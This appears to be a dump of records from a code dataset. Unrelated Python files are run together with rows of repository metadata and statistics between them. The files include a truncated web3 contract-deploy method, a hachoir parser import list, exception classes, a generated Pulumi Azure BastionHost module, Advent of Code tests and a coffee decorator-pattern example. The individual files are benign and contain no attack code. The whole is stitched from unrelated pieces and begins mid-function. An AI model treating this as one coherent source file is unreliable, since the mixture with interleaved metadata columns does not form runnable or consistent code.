sys.exit()
except websockets.exceptions.InvalidMessage:
console_log(
"'%s' failed!" % (self.get_url_host_port()),
"error", "WebSocketsConnectionPool")
sys.exit()
except FileNotFoundError:
console_log(
"'%s' failed!" % (self.get_url_host_port()),
"error", "ICPConnectionPool")
sys.exit()
try:
transaction_receipt = self.web3.eth.waitForTransactionReceipt(tx_hash, timeout=720)
address = transaction_receipt['contractAddress']
deployed = {
"links": dict(),
"contractAddress": address,
"transactionHash": self.web3.toHex(tx_hash)
}
artifact['networks'].setdefault(generate_numbers(), deployed)
artifact['updatedAt'] = str(datetime.now())
console_log(title="Deploy",
text="%s done!" % contract_name, _type="success")
console_log(title="TransactionHash", space=True,
text=str(self.web3.toHex(tx_hash)), _type="success")
console_log(title="Address", space=True,
text=str(address), _type="success")
artifact = self.web3.toText(dumps(artifact, indent=1).encode())
return artifact
except web3.utils.threads.Timeout as timeout:
address = "Unknown"
deployed = {
"links": dict(),
"contractAddress": address,
"transactionHash": self.web3.toHex(tx_hash)
}
artifact['networks'].setdefault(generate_numbers(), deployed)
artifact['updatedAt'] = str(datetime.now())
console_log(title="Deploy",
text="%s not done!" % contract_name, _type="warning")
console_log(title="TransactionHash", space=True,
text=str(self.web3.toHex(tx_hash)), _type="warning")
console_log(title="Address", space=True,
text=str(address), _type="warning")
console_log(title="Timeout", _type="error",
text="%s, %s still on mining!" % (str(timeout),
str(self.web3.toHex(tx_hash))))
artifact = self.web3.toText(dumps(artifact, indent=1).encode())
return artifact
else:
console_log(title="Deploy", text="Already deployed.%s" %
contract_name, _type="warning")
artifact = self.web3.toText(dumps(artifact, indent=1).encode())
return artifact
| 49.528345 | 120 | 0.489149 | 1,793 | 21,842 | 5.766313 | 0.090351 | 0.037915 | 0.027662 | 0.019731 | 0.825515 | 0.780443 | 0.758391 | 0.742818 | 0.723087 | 0.723087 | 0 | 0.009494 | 0.416491 | 21,842 | 440 | 121 | 49.640909 | 0.801726 | 0.008058 | 0 | 0.800487 | 0 | 0 | 0.092424 | 0.004432 | 0 | 0 | 0 | 0 | 0 | 1 | 0.019465 | false | 0 | 0.004866 | 0 | 0.082725 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2e719f02b32505168181c2764a8572938755d339 | 265 | py | Python | .modules/.metagoofil/hachoir_parser/program/__init__.py | termux-one/EasY_HaCk | 0a8d09ca4b126b027b6842e02fa0c29d8250e090 | [
"Apache-2.0"
] | 1,103 | 2018-04-20T14:08:11.000Z | 2022-03-29T06:22:43.000Z | .modules/.metagoofil/hachoir_parser/program/__init__.py | sshourya948/EasY_HaCk | 0a8d09ca4b126b027b6842e02fa0c29d8250e090 | [
"Apache-2.0"
] | 29 | 2019-04-03T14:52:38.000Z | 2022-03-24T12:33:05.000Z | .modules/.metagoofil/hachoir_parser/program/__init__.py | sshourya948/EasY_HaCk | 0a8d09ca4b126b027b6842e02fa0c29d8250e090 | [
"Apache-2.0"
] | 262 | 2017-09-16T22:15:50.000Z | 2022-03-31T00:38:42.000Z | from hachoir_parser.program.elf import ElfFile
from hachoir_parser.program.exe import ExeFile
from hachoir_parser.program.python import PythonCompiledFile
from hachoir_parser.program.java import JavaCompiledClassFile
from hachoir_parser.program.prc import PRCFile
| 37.857143 | 61 | 0.883019 | 35 | 265 | 6.542857 | 0.428571 | 0.240175 | 0.371179 | 0.524017 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.079245 | 265 | 6 | 62 | 44.166667 | 0.938525 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
5cf2403093ccc2c3e1832259a760a5ed2b27f1d6 | 138 | py | Python | pptb/__init__.py | hanknewbird/paddle-toolbox | 1f1e4d2dd38e797092c1bba0ec3797dd4bef43f6 | [
"Apache-2.0",
"MIT"
] | 1 | 2021-12-08T03:50:11.000Z | 2021-12-08T03:50:11.000Z | pptb/__init__.py | hanknewbird/paddle-toolbox | 1f1e4d2dd38e797092c1bba0ec3797dd4bef43f6 | [
"Apache-2.0",
"MIT"
] | null | null | null | pptb/__init__.py | hanknewbird/paddle-toolbox | 1f1e4d2dd38e797092c1bba0ec3797dd4bef43f6 | [
"Apache-2.0",
"MIT"
] | null | null | null | from pptb.utils.version_checker import assert_version_greater_equal
__version__ = "0.1.9-alpha.1"
assert_version_greater_equal("2.1.2")
| 23 | 67 | 0.818841 | 23 | 138 | 4.434783 | 0.608696 | 0.254902 | 0.392157 | 0.490196 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.054688 | 0.072464 | 138 | 5 | 68 | 27.6 | 0.742188 | 0 | 0 | 0 | 0 | 0 | 0.130435 | 0 | 0 | 0 | 0 | 0 | 0.666667 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
5cf46a66ee3e09b1ad2197fff1dafa51b98ad8e4 | 191 | py | Python | bugger/exceptions.py | catharsis/bugger | e8d43eaa9f3197d06bf31a651171baed6cd45c7c | [
"BSD-2-Clause"
] | 1 | 2016-04-30T18:11:55.000Z | 2016-04-30T18:11:55.000Z | bugger/exceptions.py | catharsis/bugger | e8d43eaa9f3197d06bf31a651171baed6cd45c7c | [
"BSD-2-Clause"
] | 1 | 2019-03-01T21:51:42.000Z | 2019-03-01T21:51:42.000Z | bugger/exceptions.py | catharsis/bugger | e8d43eaa9f3197d06bf31a651171baed6cd45c7c | [
"BSD-2-Clause"
] | null | null | null | class NoPaging(Exception): pass
class BuggerLoginError(Exception): pass
class BugNotFound(Exception): pass
class BugRenderError(Exception): pass
class BackendConnectionError(Exception): pass
| 31.833333 | 45 | 0.842932 | 20 | 191 | 8.05 | 0.4 | 0.403727 | 0.447205 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.078534 | 191 | 5 | 46 | 38.2 | 0.914773 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 1 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 7 |
cf11131259414c6c3f02d8aebba4103ceb9f2c53 | 20,677 | py | Python | sdk/python/pulumi_azure/compute/bastion_host.py | aangelisc/pulumi-azure | 71dd9c75403146e16f7480e5a60b08bc0329660e | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure/compute/bastion_host.py | aangelisc/pulumi-azure | 71dd9c75403146e16f7480e5a60b08bc0329660e | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure/compute/bastion_host.py | aangelisc/pulumi-azure | 71dd9c75403146e16f7480e5a60b08bc0329660e | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['BastionHostArgs', 'BastionHost']
@pulumi.input_type
class BastionHostArgs:
def __init__(__self__, *,
resource_group_name: pulumi.Input[str],
ip_configuration: Optional[pulumi.Input['BastionHostIpConfigurationArgs']] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a BastionHost resource.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the Bastion Host.
:param pulumi.Input['BastionHostIpConfigurationArgs'] ip_configuration: A `ip_configuration` block as defined below.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created. Review [Azure Bastion Host FAQ](https://docs.microsoft.com/en-us/azure/bastion/bastion-faq) for supported locations.
:param pulumi.Input[str] name: Specifies the name of the Bastion Host. Changing this forces a new resource to be created.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
pulumi.set(__self__, "resource_group_name", resource_group_name)
if ip_configuration is not None:
pulumi.set(__self__, "ip_configuration", ip_configuration)
if location is not None:
pulumi.set(__self__, "location", location)
if name is not None:
pulumi.set(__self__, "name", name)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group in which to create the Bastion Host.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="ipConfiguration")
def ip_configuration(self) -> Optional[pulumi.Input['BastionHostIpConfigurationArgs']]:
"""
A `ip_configuration` block as defined below.
"""
return pulumi.get(self, "ip_configuration")
@ip_configuration.setter
def ip_configuration(self, value: Optional[pulumi.Input['BastionHostIpConfigurationArgs']]):
pulumi.set(self, "ip_configuration", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created. Review [Azure Bastion Host FAQ](https://docs.microsoft.com/en-us/azure/bastion/bastion-faq) for supported locations.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the Bastion Host. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@pulumi.input_type
class _BastionHostState:
def __init__(__self__, *,
dns_name: Optional[pulumi.Input[str]] = None,
ip_configuration: Optional[pulumi.Input['BastionHostIpConfigurationArgs']] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
Input properties used for looking up and filtering BastionHost resources.
:param pulumi.Input[str] dns_name: The FQDN for the Bastion Host.
:param pulumi.Input['BastionHostIpConfigurationArgs'] ip_configuration: A `ip_configuration` block as defined below.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created. Review [Azure Bastion Host FAQ](https://docs.microsoft.com/en-us/azure/bastion/bastion-faq) for supported locations.
:param pulumi.Input[str] name: Specifies the name of the Bastion Host. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the Bastion Host.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
if dns_name is not None:
pulumi.set(__self__, "dns_name", dns_name)
if ip_configuration is not None:
pulumi.set(__self__, "ip_configuration", ip_configuration)
if location is not None:
pulumi.set(__self__, "location", location)
if name is not None:
pulumi.set(__self__, "name", name)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="dnsName")
def dns_name(self) -> Optional[pulumi.Input[str]]:
"""
The FQDN for the Bastion Host.
"""
return pulumi.get(self, "dns_name")
@dns_name.setter
def dns_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "dns_name", value)
@property
@pulumi.getter(name="ipConfiguration")
def ip_configuration(self) -> Optional[pulumi.Input['BastionHostIpConfigurationArgs']]:
"""
A `ip_configuration` block as defined below.
"""
return pulumi.get(self, "ip_configuration")
@ip_configuration.setter
def ip_configuration(self, value: Optional[pulumi.Input['BastionHostIpConfigurationArgs']]):
pulumi.set(self, "ip_configuration", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created. Review [Azure Bastion Host FAQ](https://docs.microsoft.com/en-us/azure/bastion/bastion-faq) for supported locations.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the Bastion Host. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the resource group in which to create the Bastion Host.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
class BastionHost(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
ip_configuration: Optional[pulumi.Input[pulumi.InputType['BastionHostIpConfigurationArgs']]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
"""
Manages a Bastion Host.
## Example Usage
This example deploys an Azure Bastion Host Instance to a target virtual network.
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_virtual_network = azure.network.VirtualNetwork("exampleVirtualNetwork",
address_spaces=["192.168.1.0/24"],
location=example_resource_group.location,
resource_group_name=example_resource_group.name)
example_subnet = azure.network.Subnet("exampleSubnet",
resource_group_name=example_resource_group.name,
virtual_network_name=example_virtual_network.name,
address_prefixes=["192.168.1.224/27"])
example_public_ip = azure.network.PublicIp("examplePublicIp",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
allocation_method="Static",
sku="Standard")
example_bastion_host = azure.compute.BastionHost("exampleBastionHost",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
ip_configuration=azure.compute.BastionHostIpConfigurationArgs(
name="configuration",
subnet_id=example_subnet.id,
public_ip_address_id=example_public_ip.id,
))
```
## Import
Bastion Hosts can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:compute/bastionHost:BastionHost example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/mygroup1/providers/Microsoft.Network/bastionHosts/instance1
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[pulumi.InputType['BastionHostIpConfigurationArgs']] ip_configuration: A `ip_configuration` block as defined below.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created. Review [Azure Bastion Host FAQ](https://docs.microsoft.com/en-us/azure/bastion/bastion-faq) for supported locations.
:param pulumi.Input[str] name: Specifies the name of the Bastion Host. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the Bastion Host.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: BastionHostArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages a Bastion Host.
## Example Usage
This example deploys an Azure Bastion Host Instance to a target virtual network.
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_virtual_network = azure.network.VirtualNetwork("exampleVirtualNetwork",
address_spaces=["192.168.1.0/24"],
location=example_resource_group.location,
resource_group_name=example_resource_group.name)
example_subnet = azure.network.Subnet("exampleSubnet",
resource_group_name=example_resource_group.name,
virtual_network_name=example_virtual_network.name,
address_prefixes=["192.168.1.224/27"])
example_public_ip = azure.network.PublicIp("examplePublicIp",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
allocation_method="Static",
sku="Standard")
example_bastion_host = azure.compute.BastionHost("exampleBastionHost",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
ip_configuration=azure.compute.BastionHostIpConfigurationArgs(
name="configuration",
subnet_id=example_subnet.id,
public_ip_address_id=example_public_ip.id,
))
```
## Import
Bastion Hosts can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:compute/bastionHost:BastionHost example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/mygroup1/providers/Microsoft.Network/bastionHosts/instance1
```
:param str resource_name: The name of the resource.
:param BastionHostArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(BastionHostArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
ip_configuration: Optional[pulumi.Input[pulumi.InputType['BastionHostIpConfigurationArgs']]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = BastionHostArgs.__new__(BastionHostArgs)
__props__.__dict__["ip_configuration"] = ip_configuration
__props__.__dict__["location"] = location
__props__.__dict__["name"] = name
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["tags"] = tags
__props__.__dict__["dns_name"] = None
super(BastionHost, __self__).__init__(
'azure:compute/bastionHost:BastionHost',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
dns_name: Optional[pulumi.Input[str]] = None,
ip_configuration: Optional[pulumi.Input[pulumi.InputType['BastionHostIpConfigurationArgs']]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None) -> 'BastionHost':
"""
Get an existing BastionHost resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] dns_name: The FQDN for the Bastion Host.
:param pulumi.Input[pulumi.InputType['BastionHostIpConfigurationArgs']] ip_configuration: A `ip_configuration` block as defined below.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created. Review [Azure Bastion Host FAQ](https://docs.microsoft.com/en-us/azure/bastion/bastion-faq) for supported locations.
:param pulumi.Input[str] name: Specifies the name of the Bastion Host. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the Bastion Host.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _BastionHostState.__new__(_BastionHostState)
__props__.__dict__["dns_name"] = dns_name
__props__.__dict__["ip_configuration"] = ip_configuration
__props__.__dict__["location"] = location
__props__.__dict__["name"] = name
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["tags"] = tags
return BastionHost(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="dnsName")
def dns_name(self) -> pulumi.Output[str]:
"""
The FQDN for the Bastion Host.
"""
return pulumi.get(self, "dns_name")
@property
@pulumi.getter(name="ipConfiguration")
def ip_configuration(self) -> pulumi.Output[Optional['outputs.BastionHostIpConfiguration']]:
"""
A `ip_configuration` block as defined below.
"""
return pulumi.get(self, "ip_configuration")
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
"""
Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created. Review [Azure Bastion Host FAQ](https://docs.microsoft.com/en-us/azure/bastion/bastion-faq) for supported locations.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Specifies the name of the Bastion Host. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Output[str]:
"""
The name of the resource group in which to create the Bastion Host.
"""
return pulumi.get(self, "resource_group_name")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
| 46.257271 | 277 | 0.663104 | 2,407 | 20,677 | 5.48899 | 0.089738 | 0.073267 | 0.063579 | 0.046624 | 0.862019 | 0.848395 | 0.834847 | 0.821299 | 0.817439 | 0.807826 | 0 | 0.007168 | 0.237607 | 20,677 | 446 | 278 | 46.360987 | 0.830944 | 0.419258 | 0 | 0.711712 | 1 | 0 | 0.111826 | 0.033762 | 0 | 0 | 0 | 0 | 0 | 1 | 0.157658 | false | 0.004505 | 0.031532 | 0 | 0.283784 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
cf476ab2918076b88e72c27bf0e9bca6b1d1e482 | 2,273 | py | Python | tests/test_p02.py | vlasovskikh/advent-of-code-2021 | 2aa6ef98535f22a2d6b07662375b67a4fa2a3a69 | [
"MIT"
] | 4 | 2021-11-30T19:16:56.000Z | 2022-01-10T13:34:53.000Z | tests/test_p02.py | vlasovskikh/advent-of-code-2021 | 2aa6ef98535f22a2d6b07662375b67a4fa2a3a69 | [
"MIT"
] | null | null | null | tests/test_p02.py | vlasovskikh/advent-of-code-2021 | 2aa6ef98535f22a2d6b07662375b67a4fa2a3a69 | [
"MIT"
] | null | null | null | from aoc21.p02 import execute_submarine_commands
def test_empty():
assert execute_submarine_commands([], use_aim=False) == (0, 0)
assert execute_submarine_commands([], use_aim=True) == (0, 0)
def test_single_forward():
assert (
execute_submarine_commands(
[
("forward", 5),
],
use_aim=False,
)
== (5, 0)
)
assert (
execute_submarine_commands(
[
("forward", 5),
],
use_aim=True,
)
== (5, 0)
)
def test_single_down():
assert (
execute_submarine_commands(
[
("down", 5),
],
use_aim=False,
)
== (0, 5)
)
assert (
execute_submarine_commands(
[
("down", 5),
],
use_aim=True,
)
== (0, 0)
)
def test_single_up():
assert (
execute_submarine_commands(
[
("up", 5),
],
use_aim=False,
)
== (0, -5)
)
assert (
execute_submarine_commands(
[
("up", 5),
],
use_aim=True,
)
== (0, 0)
)
def test_simple_combination():
assert (
execute_submarine_commands(
[
("forward", 3),
("down", 4),
],
use_aim=False,
)
== (3, 4)
)
assert (
execute_submarine_commands(
[
("forward", 3),
("down", 4),
],
use_aim=True,
)
== (3, 0)
)
def test_complex_combination():
assert (
execute_submarine_commands(
[
("forward", 3),
("down", 4),
("forward", 5),
("up", 2),
],
use_aim=False,
)
== (8, 2)
)
assert (
execute_submarine_commands(
[
("forward", 3),
("down", 4),
("forward", 5),
("up", 2),
],
use_aim=True,
)
== (8, 20)
)
| 18.941667 | 66 | 0.361197 | 174 | 2,273 | 4.436782 | 0.166667 | 0.26943 | 0.404145 | 0.466321 | 0.812176 | 0.809585 | 0.724093 | 0.724093 | 0.42487 | 0.396373 | 0 | 0.042304 | 0.511219 | 2,273 | 119 | 67 | 19.10084 | 0.652565 | 0 | 0 | 0.579439 | 0 | 0 | 0.038715 | 0 | 0 | 0 | 0 | 0 | 0.11215 | 1 | 0.056075 | true | 0 | 0.009346 | 0 | 0.065421 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
d86b47b5c0a0af1d4d191de211e9cd27953f0146 | 2,624 | py | Python | Week 5/decorator.py | rmit-s3559384-andrew-alvaro/IoT | ec444d0b037ddbd2e3aab01c34ea57fd2bd51d5f | [
"MIT"
] | null | null | null | Week 5/decorator.py | rmit-s3559384-andrew-alvaro/IoT | ec444d0b037ddbd2e3aab01c34ea57fd2bd51d5f | [
"MIT"
] | 1 | 2021-06-01T23:39:58.000Z | 2021-06-01T23:39:58.000Z | Week 5/decorator.py | AndrewAlvaro/IoT | ec444d0b037ddbd2e3aab01c34ea57fd2bd51d5f | [
"MIT"
] | null | null | null | # Reference: https://www.tutorialspoint.com/python_design_patterns/python_design_patterns_decorator.htm
# Adopted for learning pursposes only.
import six
from abc import ABCMeta
@six.add_metaclass(ABCMeta)
class Abstract_Coffee(object):
def get_cost(self):
pass
def get_ingredients(self):
pass
def get_tax(self):
return 0.1 * self.get_cost()
class Concrete_Coffee(Abstract_Coffee):
def get_cost(self):
return 1.00
def get_ingredients(self):
return "coffee"
@six.add_metaclass(ABCMeta)
class Abstract_Coffee_Decorator(Abstract_Coffee):
def __init__(self, decorated_coffee):
self.decorated_coffee = decorated_coffee
def get_cost(self):
return self.decorated_coffee.get_cost()
def get_ingredients(self):
return self.decorated_coffee.get_ingredients()
class Sugar(Abstract_Coffee_Decorator):
def __init__(self, decorated_coffee):
Abstract_Coffee_Decorator.__init__(self, decorated_coffee)
def get_cost(self):
return self.decorated_coffee.get_cost()
def get_ingredients(self):
return self.decorated_coffee.get_ingredients() + ", sugar"
class Milk(Abstract_Coffee_Decorator):
def __init__(self, decorated_coffee):
Abstract_Coffee_Decorator.__init__(self,decorated_coffee)
def get_cost(self):
return self.decorated_coffee.get_cost() + 0.25
def get_ingredients(self):
return self.decorated_coffee.get_ingredients() + ", milk"
class Vanilla(Abstract_Coffee_Decorator):
def __init__(self,decorated_coffee):
Abstract_Coffee_Decorator.__init__(self, decorated_coffee)
def get_cost(self):
return self.decorated_coffee.get_cost() + 0.75
def get_ingredients(self):
return self.decorated_coffee.get_ingredients() + ", vanilla"
def main():
myCoffee = Concrete_Coffee()
print("Ingredients: " + myCoffee.get_ingredients() +
"; Cost: " + str(myCoffee.get_cost()) + "; sales tax = " + str(myCoffee.get_tax()))
myCoffee = Milk(myCoffee)
print("Ingredients: " + myCoffee.get_ingredients() +
"; Cost: " + str(myCoffee.get_cost()) + "; sales tax = " + str(myCoffee.get_tax()))
myCoffee = Vanilla(myCoffee)
print("Ingredients: " + myCoffee.get_ingredients() +
"; Cost: " + str(myCoffee.get_cost()) + "; sales tax = " + str(myCoffee.get_tax()))
myCoffee = Sugar(myCoffee)
print("Ingredients: " + myCoffee.get_ingredients() +
"; Cost: " + str(myCoffee.get_cost()) + "; sales tax = " + str(myCoffee.get_tax()))
main()
